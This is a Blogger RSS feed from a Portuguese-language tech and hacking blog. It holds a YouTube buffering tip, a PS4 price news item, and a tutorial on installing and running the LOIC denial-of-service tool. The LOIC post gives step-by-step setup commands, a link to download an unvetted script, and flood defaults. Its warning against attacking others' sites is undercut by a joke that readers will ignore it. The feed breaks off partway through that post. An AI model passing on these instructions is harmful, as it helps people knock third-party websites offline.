<?xml version='1.0' encoding='UTF-8'?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/" xmlns:blogger="http://schemas.google.com/blogger/2008" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-2844162267975274904</atom:id><lastBuildDate>Fri, 01 Nov 2024 11:12:05 +0000</lastBuildDate><category>Tutoriais Hacking</category><category>Android</category><category>Coleta de informações</category><category>Diversos.</category><category>Artigos</category><category>Noticias</category><category>Tutorias Diversos</category><title>Blog Do Max</title><description></description><link>http://max-sec.blogspot.com/</link><managingEditor>noreply@blogger.com (Anonymous)</managingEditor><generator>Blogger</generator><openSearch:totalResults>16</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2844162267975274904.post-3446842499332064569</guid><pubDate>Sun, 24 Nov 2013 00:57:00 +0000</pubDate><atom:updated>2013-11-23T16:57:47.805-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Android</category><title>Acelerar o carregamento dos videos do youtube.</title><description>&lt;h2 class=&quot;olho&quot;&gt;
&lt;span style=&quot;font-weight: normal;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Sabe quando você abre um vídeo no YouTube e ele fica travando? Nem sempre é culpa do traffic shaping, pode ser apenas o Dash.&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;div id=&quot;HOTWordsTxt&quot;&gt;
Você deve ter percebido que o YouTube mudou o método de carregamento 
dos vídeos e tudo ficou parecendo muito mais lento. Antes, quem tivesse 
uma conexão lenta podia simplesmente pausar o vídeo e esperar até que o 
carregamento terminasse para assisti-lo sem enfrentar nenhum travamento.
 Hoje isso não acontece, porque o YouTube passou a adotar uma tecnologia
 chamada DASH.&lt;br /&gt;

&lt;span id=&quot;more-138641&quot;&gt;&lt;/span&gt;&lt;br /&gt;

&lt;img alt=&quot;youtube-loading&quot; class=&quot;aligncenter size-large wp-image-138648 colorbox-138641&quot; height=&quot;365&quot; src=&quot;http://tecnoblog.net/wp-content/uploads/2013/08/youtube-loading-600x365.png&quot; width=&quot;600&quot; /&gt;&lt;br /&gt;

O DASH, sigla para Dynamic Adaptive Streaming over HTTP, faz com que o
 YouTube envie o vídeo para o seu computador em vários blocos em vez de 
simplesmente carregar o vídeo inteiro de uma vez. O próximo bloco é 
carregado apenas quando você estiver terminando de assistir ao anterior.&lt;br /&gt;

Isso é até bom para o usuário em alguns casos, especialmente em 
conexões 3G com franquia de dados, porque economiza tráfego, mas também 
pode causar muitas travadinhas indesejadas e impede que você avance ou 
retroceda para algum ponto do vídeo sem ter que carregá-lo novamente. 
Mas olha só: é possível desativar o DASH!&lt;br /&gt;

A mágica acontece com a extensão YouTube Center, que pode ser baixada &lt;a href=&quot;https://github.com/YePpHa/YouTubeCenter/wiki&quot; target=&quot;_blank&quot;&gt;nesta página do GitHub&lt;/a&gt;
 para Firefox, Chrome, Opera, Safari e Maxthon. Como ela não está 
disponível na Chrome Web Store, usuários do Chrome precisam acessar a 
página chrome://extensions/, arrastar o arquivo *.crx para lá e 
confirmar a instalação da extensão.&lt;br /&gt;

&lt;a class=&quot;cboxElement&quot; href=&quot;http://tecnoblog.net/wp-content/uploads/2013/08/youtube-center-dash-playback.png&quot;&gt;&lt;img alt=&quot;youtube-center-dash-playback&quot; class=&quot;aligncenter size-large wp-image-138646 colorbox-138641&quot; height=&quot;369&quot; src=&quot;http://tecnoblog.net/wp-content/uploads/2013/08/youtube-center-dash-playback-600x369.png&quot; width=&quot;600&quot; /&gt;&lt;/a&gt;&lt;br /&gt;

Após instalar a extensão, o YouTube passará a exibir um botão de 
engrenagem no canto superior direito de todas as páginas, ao lado do seu
 nome de usuário. Clique no botão, acesse a aba Player e desmarque a 
caixinha Dash Playback. Pronto!&lt;br /&gt;

Se tudo deu certo e você possuir uma conexão rápida, o carregamento 
de qualquer vídeo no YouTube ficará muito mais rápido que antes; se sua 
conexão for lenta, apenas pause o vídeo por algum tempo para assisti-lo 
sem engasgos depois.&lt;br /&gt;

Divirta-se.&lt;br /&gt;

&lt;i&gt;Com informações: &lt;a href=&quot;http://www.ghacks.net/2013/08/12/go-back-to-youtubes-old-buffering-to-skip-without-rebuffering/&quot;&gt;gHacks&lt;/a&gt;.&lt;/i&gt;&lt;br /&gt;

&lt;/div&gt;
&lt;h2 class=&quot;olho&quot;&gt;
&lt;span style=&quot;font-weight: normal;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
</description><link>http://max-sec.blogspot.com/2013/11/acelerar-o-carregamento-dos-videos-do.html</link><author>noreply@blogger.com (Anonymous)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2844162267975274904.post-236010204515386365</guid><pubDate>Thu, 17 Oct 2013 14:01:00 +0000</pubDate><atom:updated>2013-10-17T07:01:30.300-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Noticias</category><title>PlayStation 4 custará R$ 3.999 no Brasil; nos EUA é US$ 400.</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://imguol.com/c/entretenimento/2013/06/11/playstation-4-1370921273686_450x253.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;222&quot; src=&quot;http://imguol.com/c/entretenimento/2013/06/11/playstation-4-1370921273686_450x253.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style=&quot;-webkit-text-stroke-width: 0px; background-color: black; color: white; display: inline !important; float: none; font-family: Arial; font-size: 11px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 12px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;&quot;&gt;Nos EUA, o PlayStation 4 terá preço sugerido de US$ 400&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;-webkit-text-stroke-width: 0px; background-color: black; color: white; display: inline !important; float: none; font-family: Arial; font-size: 11px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 12px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;div style=&quot;-webkit-text-stroke-width: 0px; color: black; font-family: Arial; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; margin: 0px 0px 15px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;&quot;&gt;
Acredite se quiser: o PlayStation 4 vai custar R$ 3.999 no Brasil. O anúncio foi feito pela Sony nesta quinta-feira (17), em comunicado à imprensa e também pelo PS Blog.&lt;/div&gt;
&lt;div style=&quot;-webkit-text-stroke-width: 0px; color: black; font-family: Arial; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; margin: 0px 0px 15px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;&quot;&gt;
O videogame chega ao país dia 29 de novembro, duas semanas após o lançamento nos EUA e mesma data de lançamento na Europa e restante da América Latina.&lt;/div&gt;
&lt;div style=&quot;-webkit-text-stroke-width: 0px; color: black; font-family: Arial; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; margin: 0px 0px 15px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;&quot;&gt;
Nos EUA o PS4 sai por US$ 400, valor inferior em US$ 100 ao do Xbox One, da Microsoft. Curiosamente, no Brasil a situação se inverteu: o PS4 é nada menos que R$ 1.800 mais caro.&lt;/div&gt;
&lt;div style=&quot;-webkit-text-stroke-width: 0px; color: black; font-family: Arial; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; margin: 0px 0px 15px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;&quot;&gt;
Os jogos da Sony para o videogame terão preço sugerido de R$ 179, ou seja, R$ 20 mais barato do que havia sido antecipado por engano pela loja online brasileira da Sony, que disponibilizou acidentalmente a versão digital de &quot;Knack&quot; em pré-venda por R$ 199.&lt;/div&gt;
&lt;div style=&quot;-webkit-text-stroke-width: 0px; color: black; font-family: Arial; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; margin: 0px 0px 15px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;&quot;&gt;
O preço dos jogos também é curioso: enquanto lançamentos de PS4 saem por R$ 179, novidades para o PS3 têm preço sugerido de R$ 149 desde junho de 2012. Nos EUA, lançamentos para os dois videogames saem pelo mesmo preço de US$ 60.&lt;/div&gt;
&lt;div style=&quot;-webkit-text-stroke-width: 0px; color: black; font-family: Arial; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; margin: 0px 0px 15px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;&quot;&gt;
A Sony não ofereceu explicação para o alto preço do PS4 e seus jogos no país.&lt;/div&gt;
&lt;div style=&quot;-webkit-text-stroke-width: 0px; color: black; font-family: Arial; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; margin: 0px 0px 15px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;&quot;&gt;
&amp;nbsp;Fonte:&lt;a href=&quot;http://jogos.uol.com.br/ultimas-noticias/2013/10/17/acredite-se-quiser-playstation-4-custara-r-3999-no-brasil.htm&quot;&gt; Uol Jogos &lt;/a&gt;&lt;/div&gt;
&lt;span style=&quot;-webkit-text-stroke-width: 0px; background-color: black; color: white; display: inline !important; float: none; font-family: Arial; font-size: 11px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 12px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;&quot;&gt; &lt;/span&gt;</description><link>http://max-sec.blogspot.com/2013/10/playstation-4-custara-r-3999-no-brasil.html</link><author>noreply@blogger.com (Anonymous)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2844162267975274904.post-4924173919796482514</guid><pubDate>Thu, 17 Oct 2013 06:42:00 +0000</pubDate><atom:updated>2013-10-16T23:55:53.762-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Tutoriais Hacking</category><title>LOIC - A ferramente utilizada pelos anonymous para derrubar sites.</title><description>&lt;span style=&quot;background-color: white; color: #555555; font-family: &#39;Segoe Ui&#39;; font-size: 14px;&quot;&gt;Desde que o grupo&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;background-color: white; color: #333333; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px;&quot;&gt;Anonymous&lt;/b&gt;&lt;span style=&quot;background-color: white; color: #555555; font-family: &#39;Segoe Ui&#39;; font-size: 14px;&quot;&gt;&amp;nbsp;usou o&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;background-color: white; color: #333333; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px;&quot;&gt;Low Orbit Ion Cannon&lt;/b&gt;&lt;span style=&quot;background-color: white; color: #555555; font-family: &#39;Segoe Ui&#39;; font-size: 14px;&quot;&gt;&amp;nbsp;(LOIC) para atacar uma serie de empresas que entraram no caminho do&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;background-color: white; color: #333333; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px;&quot;&gt;Wikileaks&lt;/b&gt;&lt;span style=&quot;background-color: white; color: #555555; font-family: &#39;Segoe Ui&#39;; font-size: 14px;&quot;&gt;, este software tem sido colocado no centro das atenções.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #555555; font-family: &#39;Segoe Ui&#39;; font-size: 14px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJxBMkD1SkD1szmR3VN-KDz5GuiPJtCl2rTDjCZUBLGwep3gN2h7y90sl-W9FsDoR8A_WVPw6jVVmlUVxLhjbmod7chC3mVLbjusqRErdFias1GeuDgj98xpGQ7XZqiXEUXBFtiDweqKg/s1600/anonymous.jpeg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJxBMkD1SkD1szmR3VN-KDz5GuiPJtCl2rTDjCZUBLGwep3gN2h7y90sl-W9FsDoR8A_WVPw6jVVmlUVxLhjbmod7chC3mVLbjusqRErdFias1GeuDgj98xpGQ7XZqiXEUXBFtiDweqKg/s400/anonymous.jpeg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;b style=&quot;background-color: white; color: #333333; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; text-align: start;&quot;&gt;LOIC&lt;/b&gt;&lt;span style=&quot;background-color: white; color: #555555; font-family: &#39;Segoe Ui&#39;; font-size: 14px; text-align: start;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;background-color: white; font-family: &#39;Segoe Ui&#39;; font-size: 14px; text-align: start;&quot;&gt;é uma aplicação open source de ataque de rede,&lt;/span&gt;&lt;span style=&quot;background-color: white; color: #555555; font-family: &#39;Segoe Ui&#39;; font-size: 14px; text-align: start;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;background-color: white; color: #333333; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; text-align: start;&quot;&gt;escrito em C.&lt;/b&gt;&lt;span style=&quot;background-color: white; color: #555555; font-family: &#39;Segoe Ui&#39;; font-size: 14px; text-align: start;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;background-color: white; font-family: &#39;Segoe Ui&#39;; font-size: 14px; text-align: start;&quot;&gt;LOIC executa uma negação de serviço, ataque&lt;/span&gt;&lt;span style=&quot;background-color: white; color: #555555; font-family: &#39;Segoe Ui&#39;; font-size: 14px; text-align: start;&quot;&gt; (&lt;/span&gt;&lt;b style=&quot;background-color: white; color: #333333; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; text-align: start;&quot;&gt;DoS&lt;/b&gt;&lt;span style=&quot;background-color: white; color: #555555; font-family: &#39;Segoe Ui&#39;; font-size: 14px; text-align: start;&quot;&gt;) (ou quando utilizados por várias pessoas, um ataque&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;background-color: white; color: #333333; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; text-align: start;&quot;&gt;DDoS&lt;/b&gt;&lt;span style=&quot;background-color: white; color: #555555; font-family: &#39;Segoe Ui&#39;; font-size: 14px; text-align: start;&quot;&gt;) em um local de destino, inundando o servidor com os pacotes&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;background-color: white; color: #333333; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; text-align: start;&quot;&gt;TCP, UDP, HTTP&lt;/b&gt;&lt;span style=&quot;background-color: white; color: #555555; font-family: &#39;Segoe Ui&#39;; font-size: 14px; text-align: start;&quot;&gt;&amp;nbsp;ou pedidos com a intenção de interromper o serviço de um determinado host. As pessoas têm usado para se juntar LOIC alguns&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;background-color: white; color: #333333; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; text-align: start;&quot;&gt;botnets&lt;/b&gt;&lt;span style=&quot;background-color: white; color: #555555; font-family: &#39;Segoe Ui&#39;; font-size: 14px; text-align: start;&quot;&gt;.&lt;/span&gt;&lt;/div&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; text-align: start;&quot; /&gt;
&lt;span style=&quot;background-color: white; color: #555555; font-family: &#39;Segoe Ui&#39;; font-size: 14px; text-align: start;&quot;&gt;O&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;background-color: white; color: #333333; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; text-align: start;&quot;&gt;LOIC&lt;/b&gt;&lt;span style=&quot;background-color: white; color: #555555; font-family: &#39;Segoe Ui&#39;; font-size: 14px; text-align: start;&quot;&gt;&amp;nbsp;pode ser usando para testar reações em servidores contra tal ataque e também para testar os mecanismos de segurança dos envolvidos.&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; text-align: start;&quot; /&gt;
&lt;span style=&quot;background-color: white; color: #555555; font-family: &#39;Segoe Ui&#39;; font-size: 14px; text-align: start;&quot;&gt;LOIC esta disponível no sistema operacional&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;background-color: white; color: #333333; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; text-align: start;&quot;&gt;&lt;a href=&quot;http://sourceforge.net/projects/loic/&quot;&gt;Windows XP(Clique aqui)&lt;/a&gt;&lt;/b&gt;&lt;span style=&quot;background-color: white; color: #555555; font-family: &#39;Segoe Ui&#39;; font-size: 14px; text-align: start;&quot;&gt;&amp;nbsp;ou superior, mas claro que é possível também usar no&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;background-color: white; color: #333333; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; text-align: start;&quot;&gt;GNU/Linux&lt;/b&gt;&lt;span style=&quot;background-color: white; color: #555555; font-family: &#39;Segoe Ui&#39;; font-size: 14px; text-align: start;&quot;&gt;&amp;nbsp;com algumas manipulações.&lt;/span&gt;&lt;br /&gt;
&lt;b style=&quot;background-color: white; color: #333333; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; text-align: start;&quot;&gt;&lt;br /&gt;Instalando o LOIC&lt;/b&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; text-align: start;&quot; /&gt;
&lt;span style=&quot;background-color: white; color: #555555; font-family: &#39;Segoe Ui&#39;; font-size: 14px; text-align: start;&quot;&gt;Provavelmente e possível a instalação em todas as distribuições linux. Nessa tutorial estou usando o&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;background-color: white; color: #333333; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; text-align: start;&quot;&gt;Ubuntu&lt;/b&gt;&lt;span style=&quot;background-color: white; color: #555555; font-family: &#39;Segoe Ui&#39;; font-size: 14px; text-align: start;&quot;&gt;.&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; text-align: start;&quot; /&gt;
&lt;span style=&quot;background-color: white; color: #555555; font-family: &#39;Segoe Ui&#39;; font-size: 14px; text-align: start;&quot;&gt;Começamos instalando os seguinte programas:&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; text-align: start;&quot; /&gt;
&lt;span style=&quot;background-color: white; color: #555555; font-family: &#39;Segoe Ui&#39;; font-size: 14px; text-align: start;&quot;&gt;No Ubuntu/Debian entre no shell e execute:&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; text-align: start;&quot; /&gt;
&lt;b style=&quot;background-color: white; color: blue; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; text-align: start;&quot;&gt;sudo apt-get install git-core monodevelop&lt;/b&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; text-align: start;&quot; /&gt;
&lt;span style=&quot;background-color: white; color: #555555; font-family: &#39;Segoe Ui&#39;; font-size: 14px; text-align: start;&quot;&gt;Encontrei um script que nos permite: Inicia, atualizar e executar o LOIC.&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; text-align: start;&quot; /&gt;
&lt;b style=&quot;background-color: white; color: blue; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; text-align: start;&quot;&gt;mkdir ~loic&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b style=&quot;background-color: white; color: blue; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; text-align: start;&quot;&gt;Baixe o script&amp;nbsp;&lt;/b&gt;&lt;a href=&quot;http://www.4shared.com/get/UCPmSqv4/loic.html&quot;&gt;http://www.4shared.com/get/UCPmSqv4/loic.html&lt;/a&gt;&lt;b style=&quot;background-color: white; color: blue; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; text-align: start;&quot;&gt;&lt;br /&gt;mv loic.sh /home/bhior/~loic&lt;br /&gt;cd ~loic&lt;br /&gt;chmod a+x loic.sh&lt;/b&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; text-align: start;&quot; /&gt;
&lt;b style=&quot;background-color: white; color: #333333; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; text-align: start;&quot;&gt;Instalando o LOIC.&lt;/b&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; text-align: start;&quot; /&gt;
&lt;span style=&quot;background-color: white; font-family: &#39;Segoe Ui&#39;; font-size: 14px; text-align: start;&quot;&gt;Entre com o seguinte comando:&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; text-align: start;&quot; /&gt;
&lt;b style=&quot;background-color: white; color: blue; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; text-align: start;&quot;&gt;./loic.sh install&lt;/b&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; text-align: start;&quot; /&gt;
&lt;span style=&quot;background-color: white; font-family: &#39;Segoe Ui&#39;; font-size: 14px; text-align: start;&quot;&gt;O script ira baixar a ultima versão dispobivel, e em seguinda, executar uma instalação no diretorio ~/loic/LOIC.&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; text-align: start;&quot; /&gt;
&lt;b style=&quot;background-color: white; color: #333333; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; text-align: start;&quot;&gt;Atualizando o LOIC&lt;/b&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; text-align: start;&quot; /&gt;
&lt;span style=&quot;background-color: white; color: #555555; font-family: &#39;Segoe Ui&#39;; font-size: 14px; text-align: start;&quot;&gt;Entre com o seguinte comando:&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; text-align: start;&quot; /&gt;
&lt;b style=&quot;background-color: white; color: blue; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; text-align: start;&quot;&gt;./loic.sh update&lt;/b&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; text-align: start;&quot; /&gt;
&lt;span style=&quot;background-color: white; color: #555555; font-family: &#39;Segoe Ui&#39;; font-size: 14px; text-align: start;&quot;&gt;O script irá verificar a existência de uma nova versão disponível no GIT, e em seguida, executar uma instalação no diretório ~/loic/LOIC.&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; text-align: start;&quot; /&gt;
&lt;b style=&quot;background-color: white; color: #333333; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; text-align: start;&quot;&gt;Iniciando o LOIC&lt;/b&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; text-align: start;&quot; /&gt;
&lt;span style=&quot;background-color: white; color: #555555; font-family: &#39;Segoe Ui&#39;; font-size: 14px; text-align: start;&quot;&gt;Agora e a parte importante:&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; text-align: start;&quot; /&gt;
&lt;b style=&quot;background-color: white; color: blue; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; text-align: start;&quot;&gt;./loic.sh run&lt;/b&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; text-align: start;&quot; /&gt;
&lt;span style=&quot;background-color: white; color: #555555; font-family: &#39;Segoe Ui&#39;; font-size: 14px; text-align: start;&quot;&gt;A seguinte janela deverá aparecer:&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEit0NwSAsdKFKq5ILmyW3L75wXJGQhIDETMXVMzGDLV6G3jIgIBgux0oSJeLDYQjLxO9cl12tkScAmFlzD6_E-uyXkJPPgQFVtBXzACGztQgcwV-dpxgmb-yfd38SwhQAqiZzgkVy-sdiA/s1600/loic.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;312&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEit0NwSAsdKFKq5ILmyW3L75wXJGQhIDETMXVMzGDLV6G3jIgIBgux0oSJeLDYQjLxO9cl12tkScAmFlzD6_E-uyXkJPPgQFVtBXzACGztQgcwV-dpxgmb-yfd38SwhQAqiZzgkVy-sdiA/s640/loic.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;color: #555555; font-family: &#39;Segoe Ui&#39;; font-size: 14px; margin-bottom: 10px;&quot;&gt;
Não testem este software em um site que não pertence a você! Na verdade, o software não tem nenhum mecanismo para esconder o seu endereço IP, e você será mais facilmente detectado pelo site de destino. Mesmo sem prever o futuro sei que muitos não vão seguir o apelo. hahaha&lt;br /&gt;
&lt;br style=&quot;color: #333333; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px;&quot; /&gt;
Por padrão, o tipo de ataques de inundação são lançados no TCP/80 porta (mas é possível fazer ataques UDP ou HTTP). 10 processos são executados em paralelo.&lt;br /&gt;
&lt;br style=&quot;color: #333333; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px;&quot; /&gt;
&lt;br style=&quot;color: #333333; font-family: tohama, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px;&quot; /&gt;
A interface gráfica é de fácil utilização, creio que é difícil alguém ter dificuldades.&lt;/div&gt;
&lt;div style=&quot;color: #555555; font-family: &#39;Segoe Ui&#39;; font-size: 14px; margin-bottom: 10px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;color: #555555; font-family: &#39;Segoe Ui&#39;; font-size: 14px; margin-bottom: 10px;&quot;&gt;
